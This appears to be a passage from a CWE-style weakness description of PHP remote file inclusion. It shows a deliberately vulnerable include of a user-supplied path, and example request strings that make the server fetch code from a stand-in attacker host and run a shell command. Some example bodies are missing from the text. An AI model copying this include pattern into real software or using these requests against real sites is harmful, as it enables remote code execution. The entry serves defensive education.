Example 1
The following code attempts to include a function contained in a
separate PHP page on the server. It builds the path to the file by using the
supplied 'module_name' parameter and appending the string '/function.php' to
it.
victim.php
(Bad Code)
Example
Language: PHP
$dir = $_GET['module_name'];
include($dir . "/function.php");
The problem with the above code is that the value of $dir is not
restricted in any way, and a malicious user could manipulate the
'module_name' parameter to force inclusion of an unanticipated file. For
example, an attacker could request the above PHP page (example.php) with
a 'module_name' of "http://malicious.example.com" by using the following
request string:
victim.php?module_name=http://malicious.example.com
Upon receiving this request, the code would set 'module_name' to the
value "http://malicious.example.com" and would attempt to include
http://malicious.example.com/function.php, along with any malicious code
it contains.
For the sake of this example, assume that the malicious version of
function.php looks like the following:
An attacker could now go a step further in our example and provide a
request string as follows:
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l
The code will attempt to include the malicious function.php file from
the remote site. In turn, this file executes the command specified in
the 'cmd' parameter from the query string. The end result is an attempt
by tvictim.php to execute the potentially malicious command, in this
case:
Note that the above PHP example can be mitigated by setting
allow_url_fopen to false, although this will not fully protect the code.
See potential mitigations.
Description
